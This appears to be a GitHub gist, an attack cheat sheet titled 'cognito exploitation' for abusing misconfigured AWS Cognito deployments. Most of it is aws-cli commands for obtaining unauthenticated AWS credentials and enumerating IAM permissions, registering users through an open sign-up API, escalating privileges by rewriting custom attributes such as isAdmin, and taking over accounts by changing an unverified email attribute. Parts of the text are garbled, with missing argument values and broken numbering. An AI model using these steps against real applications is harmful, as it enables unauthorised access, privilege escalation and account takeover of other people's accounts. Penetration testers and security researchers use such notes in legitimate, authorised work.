Skip to content

Instantly share code, notes, and snippets.

@incogbyte

incogbyte/cognito.md

Created January 14, 2024 15:36
Show Gist options
  • Save incogbyte/e3e61ea9ee4cb20bba41f17be8d01097 to your computer and use it in GitHub Desktop.
Save incogbyte/e3e61ea9ee4cb20bba41f17be8d01097 to your computer and use it in GitHub Desktop.
Download ZIP
cognito exploitation
Raw
cognito.md

  1. Generate temporary AWS credentials using unauth user 1.1 - Get the poolId 2.1 - IdendityID 3.1 - Use the following command on aws-cli "example" $ aws cognito-identity get-id --identity-pool-id "us-east-1:f3400f4e-6a41-47db-834c-4af6d56e8359" --region "us-east-1"

    3.2 - Use the following command to get aws credentials $ aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:f3400f4e-6a41-47db-834c-4af6d56e8359" --region "us-east-1"

$ ./enumerate-iam.py --access-key --secret-key --session-token «SessionToken>

You can try to fetch temporary aWS credentials using authenticated user, after authenticated you can try to fetch the access using commands bellow

  1. Authentication bypass due to enabled signup api, some apps not authorized to signup. Use the following command to register a user $ aws cognito-idp sign-up --client-id '3sci28ttu3qa49enh6alb4k2v3' --username 'jodson' --password 'Jodson@F00' --region 'us-east-1'

    2.1 - You need to confirm the account with the follwing command $ aws cognito-idp confirm-sign-up --client-id --username < email-address> --confirmation-code < confirmation-code> --region

  2. Privilege escalation throught writable user atributes 3.1 - First you need to fetch the user attributes - $ aws cognito-idp get-user --region --access-token - Look up for the following ser attributes: - custom:isAdmin - custom:userRole - custom:isActive - custom:isApproved - custom:accessLevel 3.2 - Update the user attributes - aws cognito-idp update-user-attributes --access-token --region --user-attributes Name="",

  3. Upadate the email attribute verfication ( updating email attribute before verification )

    • aws cognito-idp update-user-attributes --access-token < access-token> --region --user-attributes Name="email" Value=""

    Even with email verification enabled, most applications will update the email attribute value to the new unverified email

Example:

  1. User victim email is: [email protected]
  2. Updating email was not possible, but using Cognito APl, researcher managed to update their email to [email protected] Misconfigurations: Email attribute is writable so it's possible to update it via Cognito API. Email attribute is case-sensitive which could have been set to insensitive from AWS console.
  3. Attacker authenticates to [email protected] Misconfigurations: email verified attribute value wasn't checked if it's True. Keep original attribute value active when an update is pending wasn't enabled.
  4. Flickr normalizes [email protected] email to [email protected] (victim) resulting in account takeover
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment